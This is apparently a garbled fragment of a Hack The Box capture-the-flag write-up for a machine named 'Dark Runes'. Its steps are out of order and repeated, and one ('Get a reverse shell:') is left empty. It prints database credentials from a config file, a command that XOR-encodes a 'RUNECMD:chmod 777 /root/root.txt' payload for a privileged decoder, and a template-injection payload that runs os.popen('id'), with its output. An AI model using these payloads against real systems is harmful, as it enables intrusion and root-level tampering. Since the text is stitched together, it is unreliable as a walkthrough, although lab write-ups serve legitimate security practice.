Htb Dark Runes [repack] ●

Payload:

Land in /var/www/darkrunes . Find config.py with PostgreSQL creds: db_user: rune_walker , db_pass: s3cr3t_run3s . Access DB:

echo -n "RUNECMD:chmod 777 /root/root.txt" > payload python3 -c 'print("".join(chr(ord(c) ^ 0x42) for c in open("payload").read()))' > /tmp/evil.rune Move to /var/runes/evil.rune and run: htb dark runes

Try re-creating the rune_decoder binary and see if you can find a different way to escalate without touching the root flag.

SSH as admin with same password.

✅ RCE achieved. Get a reverse shell:

It reads a file, XOR-decrypts it with a hardcoded key, then executes the output as a shell command if it starts with RUNECMD: . Create a malicious rune file: Payload: Land in /var/www/darkrunes

attr('__getitem__')('eval')('__import__("os").popen("id").read()') % a % endwith % uid=33(www-data) gid=33(www-data) groups=33(www-data)